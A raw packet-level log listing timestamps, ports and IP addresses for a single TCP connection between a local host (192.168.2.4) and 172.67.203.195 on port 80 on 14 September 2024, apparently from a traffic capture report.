Sep 14, 2024 18:31:12.390023947 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.390033960 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.390042067 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.390053988 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.390075922 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.390106916 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.390109062 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.390121937 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.390124083 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.390167952 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.390194893 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.390206099 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.390216112 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.390225887 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.390235901 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.390254021 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.390285969 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.390301943 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.390312910 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.390324116 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.390335083 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.390345097 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.390353918 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.390381098 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.390414000 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.390427113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.390439987 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.390467882 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.390476942 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.390482903 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.390487909 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.390522003 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.390634060 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.390645027 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.390655994 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.390666962 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.390678883 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.390690088 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.390691042 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.390705109 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.390712976 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.390714884 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.390727997 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.390738010 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.390739918 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.390764952 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.390774965 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.390783072 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.390788078 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.390798092 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.390839100 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.390861034 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.390870094 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.390882015 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.390892029 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.390902996 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.390933990 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.390973091 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.390974045 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.390988111 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.390999079 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.391009092 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.391028881 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.391063929 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.391098976 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.391108990 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.391114950 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.391119957 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.391124964 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.391134977 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.391146898 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.391158104 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.391171932 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.391206026 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.391206026 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.399318933 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.399328947 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.399347067 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.399358034 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.399369001 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.399398088 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.399424076 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.399425030 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.399437904 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.399447918 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.399480104 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.399512053 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.428652048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.428669930 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.428683043 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.428693056 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.428705931 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.428716898 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.428723097 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.428730011 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.428742886 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.428764105 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.428787947 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.493251085 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.493302107 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.493386030 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.493437052 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.493448973 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.493454933 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.493459940 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.493465900 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.493472099 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.493516922 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.493522882 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.493529081 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.493540049 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.493546009 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.493594885 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.493645906 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.493733883 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.493746996 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.493757963 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.493768930 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.493779898 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.493788958 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.493793011 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.493805885 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.493808031 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.493818045 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.493829966 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.493829966 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.493844032 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.493869066 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.493865013 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.493885994 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.493910074 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.494091034 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.494103909 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.494113922 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.494124889 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.494134903 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.494141102 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.494148016 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.494159937 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.494163036 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.494172096 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.494184971 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.494196892 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.494206905 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.494215012 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.494219065 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.494231939 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.494242907 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.494255066 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.494256020 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.494277954 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.494297981 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.494505882 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.494517088 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.494528055 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.494538069 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.494549036 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.494560003 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.494560003 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.494573116 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.494579077 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.494585037 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.494596958 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.494605064 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.494609118 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.494630098 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.494631052 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.494641066 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.494652987 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.494653940 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.494664907 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.494672060 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.494678974 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.494690895 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.494703054 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.494714022 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.494725943 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.494729996 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.494736910 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.494750977 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.494762897 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.494771957 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.494774103 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.494787931 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.494792938 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.494800091 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.494821072 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.494841099 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.495153904 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.495166063 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.495176077 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.495186090 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.495197058 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.495206118 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.495208979 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.495220900 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.495227098 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.495232105 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.495243073 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.495249033 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.495269060 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.546901941 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:13.757958889 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:13.762933969 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.001019955 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.009351015 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.017775059 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.138669014 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.138680935 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.138686895 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.138690948 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.138695955 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.138700962 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.138839960 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.138854027 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.138864040 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.138868093 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.138876915 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.138885975 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.138895988 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.138905048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.138915062 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.138923883 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.139005899 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.139015913 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.139025927 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.139036894 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.139048100 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.139141083 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.139149904 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.139159918 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.139168978 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.139178991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.139188051 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.139215946 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.139216900 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.139216900 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.139216900 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.139216900 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.139276981 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.139286995 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.139297009 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.139307022 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.139390945 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.139400959 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.139411926 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.139421940 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.139431000 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.139441967 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.139456987 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.139467955 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.139492035 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.139492035 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.139492035 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.139492035 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.139492035 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.139607906 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.139616966 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.139698029 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.139707088 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.139717102 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.139725924 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.139736891 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.139746904 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.139755964 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.139786005 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.139786005 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.139786959 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.139854908 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.139863968 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.139866114 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.139875889 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.139885902 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.139895916 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.139905930 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.139909029 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.139915943 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.139960051 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.187752008 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.219835997 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.219846010 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.219856024 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.219902039 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.219909906 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.219913960 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.219918966 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.219933033 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.219942093 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.220021963 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.220031023 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.220041037 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.220051050 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.220062017 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.220062017 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.220113993 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.220115900 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.220125914 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.220182896 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.220197916 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.220206976 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.220216990 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.220227003 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.220240116 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.220249891 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.220354080 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.220366001 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.220376015 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.220385075 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.220395088 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.220396996 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.220397949 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.220406055 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.220417023 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.220427036 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.220462084 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.220483065 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.220506907 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.220557928 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.220568895 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.220578909 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.220588923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.220599890 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.220608950 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.220608950 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.220619917 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.220647097 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.220691919 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.220701933 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.220709085 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.220738888 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:14.220772982 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.220783949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:14.220792055 CEST	80	49738	172.67.203.195	192.168.2.4
